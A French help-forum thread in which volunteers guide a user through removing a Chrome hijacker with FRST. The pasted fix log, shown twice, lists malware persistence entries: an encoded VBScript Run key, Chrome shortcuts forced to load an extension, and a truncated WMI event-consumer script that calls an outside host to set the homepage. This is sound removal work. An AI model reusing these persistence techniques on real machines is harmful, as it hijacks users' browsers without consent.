Bonjour,
je viens vous demander de l'aide suite a l'infection de mon pc. En effet, à chaque ouverture de chrome le message d'erreur suivant s’affiche:
Échec du chargement de l'extension depuis:
C:\Users\ADMINI~1\AppData\local\kemgadeojglibflomicgnfeopkdfflnk. Fichier manifeste absent ou illisible
J'ai effectué une analyse avec FRST. Vous trouverez ci-joints les résultats.
Merci d'avance
Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
Modérateurs : Mods Windows, Helper
- Messages : 4
- Inscription : 23 avr. 2020 19:05
Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
- Messages : 113189
- Inscription : 10 sept. 2005 13:57
Re: Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
Bonsoir,
Le rapport FRST.txt est vide
il faut laisser le scan aller au bout.
un message indique quand il est terminé.
Le rapport FRST.txt est vide
il faut laisser le scan aller au bout.
un message indique quand il est terminé.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
- Messages : 4
- Inscription : 23 avr. 2020 19:05
Re: Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
Bonsoir,Malekal_morte a écrit : ↑23 avr. 2020 22:16 Bonsoir,
Le rapport FRST.txt est vide
il faut laisser le scan aller au bout.
un message indique quand il est terminé.
Merci beaucoup pour votre remarque. j'ai refait l’analyse et voici les résultats:
https://pjjoint.malekal.com/files.php?r ... 0t10p5t7e7
https://pjjoint.malekal.com/files.php?r ... f7y9v14k15
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
- Messages : 31842
- Inscription : 28 févr. 2008 13:58
- Localisation : Breizhilienne
Re: Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
Bonjour/Bonsoir
Télécharge à coté de FRST.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.
➯ Relance FRST(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
Un redémarrage peut être nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message avec ton commentaire.
/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\
Télécharge à coté de FRST.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.➯ Relance FRST(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
Un redémarrage peut être nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message avec ton commentaire.
/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.- Messages : 4
- Inscription : 23 avr. 2020 19:05
Re: Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
Bonsoir,
Merci beaucoup pour votre aide. voici le résultat généré:
Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 24-04-2020
Exécuté par Administrateur (26-04-2020 01:59:31) Run:2
Exécuté depuis C:\Users\Administrateur\Downloads
Profils chargés: hp & Administrateur (Profils disponibles: hp & Administrateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
HKLM\...\Policies\Explorer\Run: [Updates] => "C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\kernel\r00t3r"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Orbit.lnk [2015-11-08]
ShortcutTarget: Orbit.lnk -> (Pas de fichier)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0148DBEB-406B-42B4-B39C-D563FCFBEB77} - \{0EBDE582-A3AA-437F-AA90-6C6EAFB2D7EF} -> Pas de fichier <==== ATTENTION
Task: {1BB8D79C-AF32-44AB-ABC4-14EFCACE0CE1} - \4790 -> Pas de fichier <==== ATTENTION
Task: {2AFBD0D0-DEAD-4B4E-B8B2-4531555608FB} - \FinishInstall igdhbblpcellaljokkpfhcjlagemhgjl -> Pas de fichier <==== ATTENTION
Task: {52EBECF5-9EA9-4393-9943-D1F62DE9D059} - \LuckyTab -> Pas de fichier <==== ATTENTION
Task: {5846D226-4CAA-4C42-9EBF-DED38D1D834A} - \YourFile DownloaderUpdate -> Pas de fichier <==== ATTENTION
Task: {996C5B0A-7247-4C9E-B209-5E39C26C76CD} - \182c23ec6ca7eb6a1a1891d8a6ec0955 -> Pas de fichier <==== ATTENTION
URLSearchHook: HKU\S-1-5-21-2224251207-1844845300-1087148181-1000 - (Pas de nom) - {B922D405-6D13-4A2B-AE89-08A030DA4402} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{2318C2B1-4965-11d4-9B18-009027A5CD4F} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{5018CFD2-804D-4C99-9F81-25EAEA2769DE} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{98889811-442D-49dd-99D7-DC866BE87DBC} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{B922D405-6D13-4A2B-AE89-08A030DA4402} - Pas de fichier
Toolbar: HKU\S-1-5-21-2224251207-1844845300-1087148181-1000 -> Pas de nom - {C55BBCD6-41AD-48AD-9953-3609C48EACC7} - Pas de fichier
Toolbar: HKU\S-1-5-21-2224251207-1844845300-1087148181-500 -> Pas de nom - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Pas de fichier
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== ATTENTION
WMI:subscription\ActiveScriptEventConsumer->ASEC::[ScriptText => Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (l'élément de données a 2485 caractères en plus).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Shortcut: C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MinGW-W64 project\i686-8.1.0-posix-dwarf-rt_v6-rev0\Run terminal.lnk -> C:\Program Files\mingw-w64\i686-8.1.0-posix-dwarf-rt_v6-rev0\mingw-w64.bat ()
ShortcutWithArgument: C:\Users\Administrateur\Desktop\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --load-extension="C:\Users\ADMINI~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
ShortcutWithArgument: C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --load-extension="C:\Users\ADMINI~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
ShortcutWithArgument: C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --load-extension="C:\Users\ADMINI~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
ShortcutWithArgument: C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=ChromeDefaultData
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Updates" => non trouvé(e)
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Orbit.lnk" => non trouvé(e)
"ShortcutTarget: Orbit.lnk -> (Pas de fichier)" => non trouvé(e)
HKLM\SOFTWARE\Policies\Mozilla => non trouvé(e)
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0148DBEB-406B-42B4-B39C-D563FCFBEB77} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0EBDE582-A3AA-437F-AA90-6C6EAFB2D7EF} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BB8D79C-AF32-44AB-ABC4-14EFCACE0CE1} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4790 => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AFBD0D0-DEAD-4B4E-B8B2-4531555608FB} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FinishInstall igdhbblpcellaljokkpfhcjlagemhgjl => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52EBECF5-9EA9-4393-9943-D1F62DE9D059} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LuckyTab => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5846D226-4CAA-4C42-9EBF-DED38D1D834A} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\YourFile DownloaderUpdate => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{996C5B0A-7247-4C9E-B209-5E39C26C76CD} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\182c23ec6ca7eb6a1a1891d8a6ec0955 => non trouvé(e)
"HKU\S-1-5-21-2224251207-1844845300-1087148181-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{B922D405-6D13-4A2B-AE89-08A030DA4402}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{2318C2B1-4965-11d4-9B18-009027A5CD4F}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{5018CFD2-804D-4C99-9F81-25EAEA2769DE}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{98889811-442D-49dd-99D7-DC866BE87DBC}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{B922D405-6D13-4A2B-AE89-08A030DA4402}" => non trouvé(e)
"HKU\S-1-5-21-2224251207-1844845300-1087148181-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}" => non trouvé(e)
"HKU\S-1-5-21-2224251207-1844845300-1087148181-500\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => non trouvé(e)
"CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"" => non trouvé(e)
"\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\"" => non trouvé(e)
"SethomePage Interval Timer" => non trouvé(e)
"SethomePage Interval Timer" => non trouvé(e)
"BVTFilter" => non trouvé(e)
"EventFilter sethomePage2" => non trouvé(e)
"ASEC" => non trouvé(e)
"BVTConsumer" => non trouvé(e)
C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MinGW-W64 project\i686-8.1.0-posix-dwarf-rt_v6-rev0\Run terminal.lnk => non trouvé(e).
C:\Users\Administrateur\Desktop\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 1051928 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 410 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 424 B
LocalService => 424 B
NetworkService => 424 B
hp => 424 B
Administrateur => 1106281 B
RecycleBin => 428551936 B
EmptyTemp: => 418.8 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 02:00:04 ====
Merci beaucoup pour votre aide. voici le résultat généré:
Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 24-04-2020
Exécuté par Administrateur (26-04-2020 01:59:31) Run:2
Exécuté depuis C:\Users\Administrateur\Downloads
Profils chargés: hp & Administrateur (Profils disponibles: hp & Administrateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
HKLM\...\Policies\Explorer\Run: [Updates] => "C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\kernel\r00t3r"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Orbit.lnk [2015-11-08]
ShortcutTarget: Orbit.lnk -> (Pas de fichier)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0148DBEB-406B-42B4-B39C-D563FCFBEB77} - \{0EBDE582-A3AA-437F-AA90-6C6EAFB2D7EF} -> Pas de fichier <==== ATTENTION
Task: {1BB8D79C-AF32-44AB-ABC4-14EFCACE0CE1} - \4790 -> Pas de fichier <==== ATTENTION
Task: {2AFBD0D0-DEAD-4B4E-B8B2-4531555608FB} - \FinishInstall igdhbblpcellaljokkpfhcjlagemhgjl -> Pas de fichier <==== ATTENTION
Task: {52EBECF5-9EA9-4393-9943-D1F62DE9D059} - \LuckyTab -> Pas de fichier <==== ATTENTION
Task: {5846D226-4CAA-4C42-9EBF-DED38D1D834A} - \YourFile DownloaderUpdate -> Pas de fichier <==== ATTENTION
Task: {996C5B0A-7247-4C9E-B209-5E39C26C76CD} - \182c23ec6ca7eb6a1a1891d8a6ec0955 -> Pas de fichier <==== ATTENTION
URLSearchHook: HKU\S-1-5-21-2224251207-1844845300-1087148181-1000 - (Pas de nom) - {B922D405-6D13-4A2B-AE89-08A030DA4402} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{2318C2B1-4965-11d4-9B18-009027A5CD4F} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{5018CFD2-804D-4C99-9F81-25EAEA2769DE} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{98889811-442D-49dd-99D7-DC866BE87DBC} - Pas de fichier
Toolbar: HKLM - Pas de nom - !{B922D405-6D13-4A2B-AE89-08A030DA4402} - Pas de fichier
Toolbar: HKU\S-1-5-21-2224251207-1844845300-1087148181-1000 -> Pas de nom - {C55BBCD6-41AD-48AD-9953-3609C48EACC7} - Pas de fichier
Toolbar: HKU\S-1-5-21-2224251207-1844845300-1087148181-500 -> Pas de nom - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Pas de fichier
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== ATTENTION
WMI:subscription\ActiveScriptEventConsumer->ASEC::[ScriptText => Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (l'élément de données a 2485 caractères en plus).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Shortcut: C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MinGW-W64 project\i686-8.1.0-posix-dwarf-rt_v6-rev0\Run terminal.lnk -> C:\Program Files\mingw-w64\i686-8.1.0-posix-dwarf-rt_v6-rev0\mingw-w64.bat ()
ShortcutWithArgument: C:\Users\Administrateur\Desktop\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --load-extension="C:\Users\ADMINI~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
ShortcutWithArgument: C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --load-extension="C:\Users\ADMINI~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
ShortcutWithArgument: C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --load-extension="C:\Users\ADMINI~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
ShortcutWithArgument: C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=ChromeDefaultData
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Updates" => non trouvé(e)
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Orbit.lnk" => non trouvé(e)
"ShortcutTarget: Orbit.lnk -> (Pas de fichier)" => non trouvé(e)
HKLM\SOFTWARE\Policies\Mozilla => non trouvé(e)
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0148DBEB-406B-42B4-B39C-D563FCFBEB77} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0EBDE582-A3AA-437F-AA90-6C6EAFB2D7EF} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BB8D79C-AF32-44AB-ABC4-14EFCACE0CE1} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4790 => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AFBD0D0-DEAD-4B4E-B8B2-4531555608FB} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FinishInstall igdhbblpcellaljokkpfhcjlagemhgjl => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52EBECF5-9EA9-4393-9943-D1F62DE9D059} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LuckyTab => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5846D226-4CAA-4C42-9EBF-DED38D1D834A} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\YourFile DownloaderUpdate => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{996C5B0A-7247-4C9E-B209-5E39C26C76CD} => non trouvé(e)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\182c23ec6ca7eb6a1a1891d8a6ec0955 => non trouvé(e)
"HKU\S-1-5-21-2224251207-1844845300-1087148181-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{B922D405-6D13-4A2B-AE89-08A030DA4402}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{2318C2B1-4965-11d4-9B18-009027A5CD4F}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{5018CFD2-804D-4C99-9F81-25EAEA2769DE}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{98889811-442D-49dd-99D7-DC866BE87DBC}" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\!{B922D405-6D13-4A2B-AE89-08A030DA4402}" => non trouvé(e)
"HKU\S-1-5-21-2224251207-1844845300-1087148181-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}" => non trouvé(e)
"HKU\S-1-5-21-2224251207-1844845300-1087148181-500\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => non trouvé(e)
"CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"" => non trouvé(e)
"\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\"" => non trouvé(e)
"SethomePage Interval Timer" => non trouvé(e)
"SethomePage Interval Timer" => non trouvé(e)
"BVTFilter" => non trouvé(e)
"EventFilter sethomePage2" => non trouvé(e)
"ASEC" => non trouvé(e)
"BVTConsumer" => non trouvé(e)
C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MinGW-W64 project\i686-8.1.0-posix-dwarf-rt_v6-rev0\Run terminal.lnk => non trouvé(e).
C:\Users\Administrateur\Desktop\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 1051928 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 410 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 424 B
LocalService => 424 B
NetworkService => 424 B
hp => 424 B
Administrateur => 1106281 B
RecycleBin => 428551936 B
EmptyTemp: => 418.8 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 02:00:04 ====
- Messages : 31842
- Inscription : 28 févr. 2008 13:58
- Localisation : Breizhilienne
Re: Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
Tu as fait la correction 2 fois.
C'est mieux ?
C'est mieux ?
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique Merci.
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.- Messages : 4
- Inscription : 23 avr. 2020 19:05
- Messages : 31842
- Inscription : 28 févr. 2008 13:58
- Localisation : Breizhilienne
Re: Problème kemgadeojglibflomicgnfeopkdfflnk à l'ouverture de chrome
OK supprime alors C:\FRST et tous les rapports.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique Merci.
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.-
- Sujets similaires
- Réponses
- Vues
- Dernier message
-
- 5 Réponses
- 52 Vues
-
Dernier message par angelique
-
- 22 Réponses
- 470 Vues
-
Dernier message par Parisien_entraide
-
-
Problème avec l'ouverture de l'onglet "paramètres"
par shadow » » dans Windows : Résoudre les problèmes - 11 Réponses
- 131 Vues
-
Dernier message par Malekal_morte
-
-
- 3 Réponses
- 128 Vues
-
Dernier message par Malekal_morte
-
- 6 Réponses
- 163 Vues
-
Dernier message par Malekal_morte